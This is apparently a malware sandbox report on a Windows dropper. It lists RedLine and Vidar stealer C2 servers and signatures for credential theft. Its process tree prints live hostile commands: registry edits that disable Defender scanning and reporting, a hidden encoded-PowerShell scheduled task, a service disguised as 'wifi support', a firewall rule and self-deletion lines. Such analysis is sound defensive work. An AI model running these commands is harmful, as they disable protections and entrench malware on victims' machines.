Analysis

  • max time kernel
    151s
  • max time network
    156s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-en-20220113
  • submitted
    14-03-2022 12:28

General

  • Target

    c9be5b1e22aad121a3106aca14fcf416e5e9ebac8339c79e65535b4a8af5655e.exe

  • Size

    3.4MB

  • MD5

    c13a52361410aad3ef18c3c3b20f265f

  • SHA1

    2d82599f61be2526cb04d633feadebe85db313eb

  • SHA256

    c9be5b1e22aad121a3106aca14fcf416e5e9ebac8339c79e65535b4a8af5655e

  • SHA512

    7b96a2de2127eb118809a0433c199320fd54a8275efd477ffc28254bd27839aa014461c16a475633a8585075548ee612c584988ffcda958dbe2c03ff7a584e83

Malware Config

Extracted

Family

redline

C2

5.206.224.220:81

185.11.73.22:45202

Attributes
  • auth_value

    4330eefe7c0f986c945c8babe3202f28

Extracted

Family

redline

Botnet

pizzadlyath

C2

65.108.101.231:14648

Attributes
  • auth_value

    e6050567aab45ec7a388fed4947afdc2

Extracted

Family

redline

Botnet

@ywqmre

C2

185.215.113.24:15994

Attributes
  • auth_value

    5a482aa0be2b5e01649fe7a3ce943422

Extracted

Family

vidar

Version

39.4

Botnet

706

C2

https://sergeevih43.tumblr.com/

Attributes
  • profile_id

    706

Extracted

Family

redline

Botnet

redline

C2

193.106.191.253:4752

Attributes
  • auth_value

    c6b533a917f5c6a3e6d1afd9c29f81c6

Extracted

Family

vidar

Version

50.7

Botnet

1177

C2

https://ruhr.social/@sam9al

https://koyu.space/@samsa2l

Attributes
  • profile_id

    1177

Signatures

  • Modifies Windows Defender Real-time Protection settings 3 TTPs
  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 15 IoCs
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
  • Vidar Stealer 3 IoCs
  • ASPack v2.12-2.42 8 IoCs

    Detects executables packed with ASPack v2.12-2.42

  • Creates new service(s) 1 TTPs
  • Downloads MZ/PE file
  • Executes dropped EXE 38 IoCs
  • Modifies Windows Firewall 1 TTPs
  • UPX packed file 6 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Checks BIOS information in registry 2 TTPs 15 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 12 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 22 IoCs
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses 2FA software files, possible credential harvesting 2 TTPs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 2 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 7 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 4 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 6 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 3 IoCs
  • Suspicious use of SetThreadContext 9 IoCs
  • Drops file in Windows directory 1 IoCs
  • Launches sc.exe

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 16 IoCs
  • Checks SCSI registry key(s) 3 TTPs 6 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 8 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 3 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Delays execution with timeout.exe 3 IoCs
  • Enumerates system info in registry 2 TTPs 2 IoCs
  • Kills process with taskkill 3 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 1 IoCs
  • Modifies system certificate store 2 TTPs 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 16 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\c9be5b1e22aad121a3106aca14fcf416e5e9ebac8339c79e65535b4a8af5655e.exe
    "C:\Users\Admin\AppData\Local\Temp\c9be5b1e22aad121a3106aca14fcf416e5e9ebac8339c79e65535b4a8af5655e.exe"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:2692
    • C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
      "C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
      2⤵
      • Executes dropped EXE
      • Checks computer location settings
      • Suspicious use of WriteProcessMemory
      PID:2044
      • C:\Users\Admin\AppData\Local\Temp\7zSCF7C725D\setup_install.exe
        "C:\Users\Admin\AppData\Local\Temp\7zSCF7C725D\setup_install.exe"
        3⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • Suspicious use of WriteProcessMemory
        PID:1500
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c sotema_7.exe
          4⤵
            PID:1128
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /c sotema_6.exe
            4⤵
            • Suspicious use of WriteProcessMemory
            PID:3032
            • C:\Users\Admin\AppData\Local\Temp\7zSCF7C725D\sotema_6.exe
              sotema_6.exe
              5⤵
                PID:2596
                • C:\Users\Admin\AppData\Local\Temp\is-NI0IS.tmp\sotema_6.tmp
                  "C:\Users\Admin\AppData\Local\Temp\is-NI0IS.tmp\sotema_6.tmp" /SL5="$9003E,506127,422400,C:\Users\Admin\AppData\Local\Temp\7zSCF7C725D\sotema_6.exe"
                  6⤵
                  • Executes dropped EXE
                  • Loads dropped DLL
                  PID:2300
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\system32\cmd.exe /c sotema_5.exe
              4⤵
              • Suspicious use of WriteProcessMemory
              PID:1996
              • C:\Users\Admin\AppData\Local\Temp\7zSCF7C725D\sotema_5.exe
                sotema_5.exe
                5⤵
                • Executes dropped EXE
                • Checks computer location settings
                • Suspicious use of WriteProcessMemory
                PID:2492
                • C:\Users\Admin\Documents\OvkYGpwcUM7FBN_6ekDxmdeh.exe
                  "C:\Users\Admin\Documents\OvkYGpwcUM7FBN_6ekDxmdeh.exe"
                  6⤵
                  • Executes dropped EXE
                  • Checks BIOS information in registry
                  • Checks whether UAC is enabled
                  • Suspicious use of SetThreadContext
                  PID:3804
                  • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
                    7⤵
                    • Suspicious use of AdjustPrivilegeToken
                    PID:3280
                • C:\Users\Admin\Documents\frmvz5aQ1FYVkI1p_iV_tlBF.exe
                  "C:\Users\Admin\Documents\frmvz5aQ1FYVkI1p_iV_tlBF.exe"
                  6⤵
                  • Executes dropped EXE
                  • Checks BIOS information in registry
                  • Checks whether UAC is enabled
                  • Suspicious use of SetThreadContext
                  PID:3156
                  • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
                    7⤵
                      PID:4580
                  • C:\Users\Admin\Documents\36r21qyRWPqcIVamKK16cRjU.exe
                    "C:\Users\Admin\Documents\36r21qyRWPqcIVamKK16cRjU.exe"
                    6⤵
                    • Executes dropped EXE
                    • Checks computer location settings
                    PID:3548
                    • C:\Windows\SysWOW64\WerFault.exe
                      C:\Windows\SysWOW64\WerFault.exe -u -p 3548 -s 668
                      7⤵
                      • Program crash
                      PID:4108
                    • C:\Windows\SysWOW64\WerFault.exe
                      C:\Windows\SysWOW64\WerFault.exe -u -p 3548 -s 684
                      7⤵
                      • Program crash
                      PID:4724
                    • C:\Windows\SysWOW64\WerFault.exe
                      C:\Windows\SysWOW64\WerFault.exe -u -p 3548 -s 452
                      7⤵
                      • Program crash
                      PID:5112
                    • C:\Windows\SysWOW64\WerFault.exe
                      C:\Windows\SysWOW64\WerFault.exe -u -p 3548 -s 820
                      7⤵
                      • Program crash
                      PID:5648
                    • C:\Windows\SysWOW64\WerFault.exe
                      C:\Windows\SysWOW64\WerFault.exe -u -p 3548 -s 776
                      7⤵
                      • Program crash
                      PID:6036
                    • C:\Windows\SysWOW64\WerFault.exe
                      C:\Windows\SysWOW64\WerFault.exe -u -p 3548 -s 1260
                      7⤵
                      • Program crash
                      PID:4724
                    • C:\Windows\SysWOW64\WerFault.exe
                      C:\Windows\SysWOW64\WerFault.exe -u -p 3548 -s 1268
                      7⤵
                      • Program crash
                      PID:5688
                    • C:\Windows\SysWOW64\WerFault.exe
                      C:\Windows\SysWOW64\WerFault.exe -u -p 3548 -s 1296
                      7⤵
                      • Program crash
                      PID:5948
                    • C:\Windows\SysWOW64\cmd.exe
                      "C:\Windows\System32\cmd.exe" /c taskkill /im "36r21qyRWPqcIVamKK16cRjU.exe" /f & erase "C:\Users\Admin\Documents\36r21qyRWPqcIVamKK16cRjU.exe" & exit
                      7⤵
                        PID:5444
                        • C:\Windows\SysWOW64\taskkill.exe
                          taskkill /im "36r21qyRWPqcIVamKK16cRjU.exe" /f
                          8⤵
                          • Kills process with taskkill
                          PID:3232
                      • C:\Windows\SysWOW64\WerFault.exe
                        C:\Windows\SysWOW64\WerFault.exe -u -p 3548 -s 1264
                        7⤵
                        • Program crash
                        PID:5408
                    • C:\Users\Admin\Documents\ubZu8I4o3F1WywlOisa1E5cz.exe
                      "C:\Users\Admin\Documents\ubZu8I4o3F1WywlOisa1E5cz.exe"
                      6⤵
                      • Executes dropped EXE
                      • Suspicious use of SetThreadContext
                      PID:4152
                      • C:\Users\Admin\Documents\ubZu8I4o3F1WywlOisa1E5cz.exe
                        "C:\Users\Admin\Documents\ubZu8I4o3F1WywlOisa1E5cz.exe"
                        7⤵
                        • Executes dropped EXE
                        PID:3428
                        • C:\Windows\SysWOW64\WerFault.exe
                          C:\Windows\SysWOW64\WerFault.exe -u -p 3428 -s 536
                          8⤵
                          • Program crash
                          PID:4408
                    • C:\Users\Admin\Documents\LGo8w7DkyAHV8m_UwuGnhdTj.exe
                      "C:\Users\Admin\Documents\LGo8w7DkyAHV8m_UwuGnhdTj.exe"
                      6⤵
                      • Executes dropped EXE
                      • Checks computer location settings
                      • Adds Run key to start application
                      • Suspicious use of SetThreadContext
                      • Suspicious use of AdjustPrivilegeToken
                      PID:4796
                      • C:\Windows\SysWOW64\cmd.exe
                        "C:\Windows\System32\cmd.exe" /c timeout 45
                        7⤵
                          PID:5776
                          • C:\Windows\SysWOW64\timeout.exe
                            timeout 45
                            8⤵
                            • Delays execution with timeout.exe
                            PID:6096
                        • C:\Users\Admin\AppData\Local\Temp\Ftbxknprim.exe
                          "C:\Users\Admin\AppData\Local\Temp\Ftbxknprim.exe"
                          7⤵
                          • Executes dropped EXE
                          • Checks SCSI registry key(s)
                          • Suspicious behavior: MapViewOfSection
                          PID:3480
                        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                          C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                          7⤵
                            PID:5352
                        • C:\Users\Admin\Documents\atoBvU7ToTGvdY4u9SfmZCP_.exe
                          "C:\Users\Admin\Documents\atoBvU7ToTGvdY4u9SfmZCP_.exe"
                          6⤵
                          • Executes dropped EXE
                          • Checks computer location settings
                          • Loads dropped DLL
                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                          • Checks processor information in registry
                          • Suspicious behavior: EnumeratesProcesses
                          PID:4656
                          • C:\Windows\SysWOW64\cmd.exe
                            "C:\Windows\System32\cmd.exe" /c taskkill /im atoBvU7ToTGvdY4u9SfmZCP_.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\atoBvU7ToTGvdY4u9SfmZCP_.exe" & del C:\ProgramData\*.dll & exit
                            7⤵
                              PID:6120
                              • C:\Windows\SysWOW64\taskkill.exe
                                taskkill /im atoBvU7ToTGvdY4u9SfmZCP_.exe /f
                                8⤵
                                • Kills process with taskkill
                                PID:372
                              • C:\Windows\SysWOW64\timeout.exe
                                timeout /t 6
                                8⤵
                                • Delays execution with timeout.exe
                                PID:5808
                          • C:\Users\Admin\Documents\qnorsb4S8bRMAwOcPhpqaHhL.exe
                            "C:\Users\Admin\Documents\qnorsb4S8bRMAwOcPhpqaHhL.exe"
                            6⤵
                            • Executes dropped EXE
                            • Checks BIOS information in registry
                            • Checks whether UAC is enabled
                            • Suspicious use of SetThreadContext
                            PID:4648
                          • C:\Users\Admin\Documents\XRXPq2PSXIfSKpZN2gFK4peo.exe
                            "C:\Users\Admin\Documents\XRXPq2PSXIfSKpZN2gFK4peo.exe"
                            6⤵
                            • Executes dropped EXE
                            • Checks computer location settings
                            • Adds Run key to start application
                            PID:4572
                            • C:\Windows\SysWOW64\WerFault.exe
                              C:\Windows\SysWOW64\WerFault.exe -u -p 4572 -s 1048
                              7⤵
                              • Program crash
                              PID:5576
                          • C:\Users\Admin\Documents\pO4VbAmAjkwMILaQM6dpAeAh.exe
                            "C:\Users\Admin\Documents\pO4VbAmAjkwMILaQM6dpAeAh.exe"
                            6⤵
                            • Executes dropped EXE
                            • Checks computer location settings
                            • Loads dropped DLL
                            • Checks processor information in registry
                            PID:4564
                            • C:\Windows\SysWOW64\cmd.exe
                              "C:\Windows\System32\cmd.exe" /c taskkill /im pO4VbAmAjkwMILaQM6dpAeAh.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\pO4VbAmAjkwMILaQM6dpAeAh.exe" & del C:\ProgramData\*.dll & exit
                              7⤵
                                PID:4604
                                • C:\Windows\System32\Conhost.exe
                                  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  8⤵
                                    PID:4000
                                  • C:\Windows\SysWOW64\taskkill.exe
                                    taskkill /im pO4VbAmAjkwMILaQM6dpAeAh.exe /f
                                    8⤵
                                    • Kills process with taskkill
                                    PID:4188
                                  • C:\Windows\SysWOW64\timeout.exe
                                    timeout /t 6
                                    8⤵
                                    • Delays execution with timeout.exe
                                    PID:5828
                              • C:\Users\Admin\Documents\IterBBUbdQfnPPP7WIB6JET4.exe
                                "C:\Users\Admin\Documents\IterBBUbdQfnPPP7WIB6JET4.exe"
                                6⤵
                                • Executes dropped EXE
                                • Checks BIOS information in registry
                                • Checks whether UAC is enabled
                                • Suspicious use of SetThreadContext
                                PID:4400
                              • C:\Users\Admin\Documents\REWZMy7jKNEx33SpeywrPzgC.exe
                                "C:\Users\Admin\Documents\REWZMy7jKNEx33SpeywrPzgC.exe"
                                6⤵
                                • Executes dropped EXE
                                • Checks computer location settings
                                • Suspicious use of AdjustPrivilegeToken
                                PID:4392
                              • C:\Users\Admin\Documents\SU0g1LKnWe5LWOjMhFA8Fvc_.exe
                                "C:\Users\Admin\Documents\SU0g1LKnWe5LWOjMhFA8Fvc_.exe"
                                6⤵
                                • Executes dropped EXE
                                • Checks BIOS information in registry
                                • Checks whether UAC is enabled
                                • Suspicious use of SetThreadContext
                                PID:4344
                              • C:\Users\Admin\Documents\jEKXJGqMMCWPXTRKdFdAnNuc.exe
                                "C:\Users\Admin\Documents\jEKXJGqMMCWPXTRKdFdAnNuc.exe"
                                6⤵
                                • Executes dropped EXE
                                • Checks BIOS information in registry
                                • Checks whether UAC is enabled
                                • Suspicious use of SetThreadContext
                                PID:4336
                              • C:\Users\Admin\Documents\ueWopbXrM5Ki8I0tLN0Ij3ob.exe
                                "C:\Users\Admin\Documents\ueWopbXrM5Ki8I0tLN0Ij3ob.exe"
                                6⤵
                                • Executes dropped EXE
                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                • Suspicious behavior: EnumeratesProcesses
                                • Suspicious use of AdjustPrivilegeToken
                                PID:1128
                              • C:\Users\Admin\Documents\Zv6brLv6FPNkRBBhyaBfrWKG.exe
                                "C:\Users\Admin\Documents\Zv6brLv6FPNkRBBhyaBfrWKG.exe"
                                6⤵
                                • Executes dropped EXE
                                PID:1156
                              • C:\Users\Admin\Documents\2Z5nHjEDLQaBvCcHM4cMLXoB.exe
                                "C:\Users\Admin\Documents\2Z5nHjEDLQaBvCcHM4cMLXoB.exe"
                                6⤵
                                • Executes dropped EXE
                                PID:2292
                                • C:\Windows\system32\cmd.exe
                                  C:\Windows\system32\cmd.exe /C choice /C Y /N /D Y /T 0 &Del C:\Users\Admin\Documents\2Z5nHjEDLQaBvCcHM4cMLXoB.exe
                                  7⤵
                                    PID:5596
                                    • C:\Windows\system32\choice.exe
                                      choice /C Y /N /D Y /T 0
                                      8⤵
                                        PID:4204
                                  • C:\Users\Admin\Documents\PkUfcIZxDmyULMNp72fHdcG6.exe
                                    "C:\Users\Admin\Documents\PkUfcIZxDmyULMNp72fHdcG6.exe"
                                    6⤵
                                    • Executes dropped EXE
                                    PID:2212
                                  • C:\Users\Admin\Documents\WlRvR57ZxQ28ttPHvJ_fk_Tp.exe
                                    "C:\Users\Admin\Documents\WlRvR57ZxQ28ttPHvJ_fk_Tp.exe"
                                    6⤵
                                    • Executes dropped EXE
                                    • Loads dropped DLL
                                    • Checks processor information in registry
                                    • Suspicious behavior: EnumeratesProcesses
                                    PID:4056
                                  • C:\Users\Admin\Documents\KN6r0abQ18QuTTZ84X_F4yNS.exe
                                    "C:\Users\Admin\Documents\KN6r0abQ18QuTTZ84X_F4yNS.exe"
                                    6⤵
                                    • Executes dropped EXE
                                    • Checks BIOS information in registry
                                    • Checks whether UAC is enabled
                                    • Suspicious use of SetThreadContext
                                    PID:3108
                                  • C:\Users\Admin\Documents\yxF1NYPTnWhofTOEvK37wv1n.exe
                                    "C:\Users\Admin\Documents\yxF1NYPTnWhofTOEvK37wv1n.exe"
                                    6⤵
                                    • Executes dropped EXE
                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                    • Suspicious behavior: EnumeratesProcesses
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:3956
                              • C:\Windows\SysWOW64\cmd.exe
                                C:\Windows\system32\cmd.exe /c sotema_4.exe
                                4⤵
                                • Suspicious use of WriteProcessMemory
                                PID:3472
                                • C:\Users\Admin\AppData\Local\Temp\7zSCF7C725D\sotema_4.exe
                                  sotema_4.exe
                                  5⤵
                                  • Executes dropped EXE
                                  • Suspicious use of WriteProcessMemory
                                  PID:2384
                                  • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                    C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                    6⤵
                                    • Executes dropped EXE
                                    PID:3628
                                  • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                    C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                    6⤵
                                    • Executes dropped EXE
                                    • Suspicious behavior: EnumeratesProcesses
                                    PID:4184
                              • C:\Windows\SysWOW64\cmd.exe
                                C:\Windows\system32\cmd.exe /c sotema_3.exe
                                4⤵
                                • Suspicious use of WriteProcessMemory
                                PID:1660
                                • C:\Users\Admin\AppData\Local\Temp\7zSCF7C725D\sotema_3.exe
                                  sotema_3.exe
                                  5⤵
                                  • Executes dropped EXE
                                  • Modifies system certificate store
                                  PID:3348
                                  • C:\Windows\SysWOW64\WerFault.exe
                                    C:\Windows\SysWOW64\WerFault.exe -u -p 3348 -s 1620
                                    6⤵
                                    • Program crash
                                    PID:5716
                              • C:\Windows\SysWOW64\cmd.exe
                                C:\Windows\system32\cmd.exe /c sotema_2.exe
                                4⤵
                                • Suspicious use of WriteProcessMemory
                                PID:3088
                                • C:\Users\Admin\AppData\Local\Temp\7zSCF7C725D\sotema_2.exe
                                  sotema_2.exe
                                  5⤵
                                  • Executes dropped EXE
                                  • Loads dropped DLL
                                  • Checks SCSI registry key(s)
                                  • Suspicious behavior: EnumeratesProcesses
                                  • Suspicious behavior: MapViewOfSection
                                  PID:2544
                              • C:\Windows\SysWOW64\cmd.exe
                                C:\Windows\system32\cmd.exe /c sotema_1.exe
                                4⤵
                                  PID:1304
                                  • C:\Users\Admin\AppData\Local\Temp\7zSCF7C725D\sotema_1.exe
                                    sotema_1.exe
                                    5⤵
                                    • Executes dropped EXE
                                    • Checks computer location settings
                                    • Modifies registry class
                                    • Suspicious use of WriteProcessMemory
                                    PID:2416
                                    • C:\Windows\SysWOW64\rUNdlL32.eXe
                                      "C:\Windows\system32\rUNdlL32.eXe" "C:\Users\Admin\AppData\Local\Temp\axhub.dll",axhub
                                      6⤵
                                      • Loads dropped DLL
                                      PID:3812
                                      • C:\Windows\SysWOW64\WerFault.exe
                                        C:\Windows\SysWOW64\WerFault.exe -u -p 3812 -s 600
                                        7⤵
                                        • Program crash
                                        PID:636
                          • C:\Windows\SysWOW64\WerFault.exe
                            C:\Windows\SysWOW64\WerFault.exe -pss -s 412 -p 3812 -ip 3812
                            1⤵
                              PID:4004
                            • C:\Windows\SysWOW64\WerFault.exe
                              C:\Windows\SysWOW64\WerFault.exe -u -p 2212 -s 432
                              1⤵
                              • Program crash
                              PID:4876
                            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
                              1⤵
                                PID:4640
                              • C:\Windows\SysWOW64\WerFault.exe
                                C:\Windows\SysWOW64\WerFault.exe -u -p 2212 -s 440
                                1⤵
                                • Program crash
                                PID:3588
                              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                                "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
                                1⤵
                                  PID:4104
                                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                                  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
                                  1⤵
                                    PID:3476
                                  • C:\Windows\SysWOW64\WerFault.exe
                                    C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 3428 -ip 3428
                                    1⤵
                                      PID:4808
                                    • C:\Users\Admin\AppData\Local\Temp\e5d64952-7a52-4674-9528-90ea2509b1a3.exe
                                      "C:\Users\Admin\AppData\Local\Temp\e5d64952-7a52-4674-9528-90ea2509b1a3.exe"
                                      1⤵
                                      • Executes dropped EXE
                                      • Checks processor information in registry
                                      PID:4900
                                    • C:\Windows\SysWOW64\cmd.exe
                                      "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\rrducxh\
                                      1⤵
                                        PID:4856
                                      • C:\Windows\SysWOW64\cmd.exe
                                        "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\orhgzbil.exe" C:\Windows\SysWOW64\rrducxh\
                                        1⤵
                                          PID:2140
                                        • C:\Windows\SysWOW64\WerFault.exe
                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 3548 -ip 3548
                                          1⤵
                                            PID:4424
                                          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                                            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
                                            1⤵
                                              PID:4720
                                            • C:\Windows\SysWOW64\sc.exe
                                              "C:\Windows\System32\sc.exe" create rrducxh binPath= "C:\Windows\SysWOW64\rrducxh\orhgzbil.exe /d\"C:\Users\Admin\Documents\XRXPq2PSXIfSKpZN2gFK4peo.exe\"" type= own start= auto DisplayName= "wifi support"
                                              1⤵
                                                PID:4000
                                              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                                                "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
                                                1⤵
                                                • Suspicious use of WriteProcessMemory
                                                PID:1304
                                              • C:\Users\Admin\AppData\Local\Temp\7zS9623.tmp\Install.exe
                                                .\Install.exe /S /site_id "525403"
                                                1⤵
                                                • Executes dropped EXE
                                                • Checks BIOS information in registry
                                                • Checks computer location settings
                                                • Drops file in System32 directory
                                                • Enumerates system info in registry
                                                PID:4928
                                                • C:\Windows\SysWOW64\forfiles.exe
                                                  "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
                                                  2⤵
                                                    PID:2088
                                                    • C:\Windows\SysWOW64\cmd.exe
                                                      /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
                                                      3⤵
                                                        PID:2968
                                                        • \??\c:\windows\SysWOW64\reg.exe
                                                          REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
                                                          4⤵
                                                          • Executes dropped EXE
                                                          • Suspicious use of WriteProcessMemory
                                                          PID:2596
                                                        • \??\c:\windows\SysWOW64\reg.exe
                                                          REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
                                                          4⤵
                                                            PID:5876
                                                      • C:\Windows\SysWOW64\forfiles.exe
                                                        "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
                                                        2⤵
                                                          PID:1920
                                                          • C:\Windows\SysWOW64\cmd.exe
                                                            /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
                                                            3⤵
                                                              PID:1988
                                                              • \??\c:\windows\SysWOW64\reg.exe
                                                                REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
                                                                4⤵
                                                                  PID:5868
                                                                • \??\c:\windows\SysWOW64\reg.exe
                                                                  REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
                                                                  4⤵
                                                                    PID:5784
                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                schtasks /CREATE /TN "gKkvqixvk" /SC once /ST 09:13:14 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                                                                2⤵
                                                                • Creates scheduled task(s)
                                                                PID:4120
                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                schtasks /run /I /tn "gKkvqixvk"
                                                                2⤵
                                                                  PID:1888
                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                  schtasks /DELETE /F /TN "gKkvqixvk"
                                                                  2⤵
                                                                    PID:3952
                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                    schtasks /CREATE /TN "booXbIzkEgfNdKvxAC" /SC once /ST 12:48:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\uOvKJyFirsYYYLVYA\GHoNhggtAPCruoj\XrgzNGi.exe\" j6 /site_id 525403 /S" /V1 /F
                                                                    2⤵
                                                                    • Drops file in Windows directory
                                                                    • Creates scheduled task(s)
                                                                    PID:5600
                                                                • C:\Windows\SysWOW64\sc.exe
                                                                  "C:\Windows\System32\sc.exe" description rrducxh "wifi internet conection"
                                                                  1⤵
                                                                    PID:1860
                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                    C:\Windows\SysWOW64\WerFault.exe -pss -s 384 -p 3548 -ip 3548
                                                                    1⤵
                                                                      PID:4196
                                                                    • C:\Windows\SysWOW64\sc.exe
                                                                      "C:\Windows\System32\sc.exe" start rrducxh
                                                                      1⤵
                                                                        PID:5128
                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 2212 -ip 2212
                                                                        1⤵
                                                                          PID:4224
                                                                        • C:\Windows\SysWOW64\netsh.exe
                                                                          "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
                                                                          1⤵
                                                                            PID:5308
                                                                          • C:\Users\Admin\AppData\Local\Temp\7zS7165.tmp\Install.exe
                                                                            .\Install.exe
                                                                            1⤵
                                                                            • Executes dropped EXE
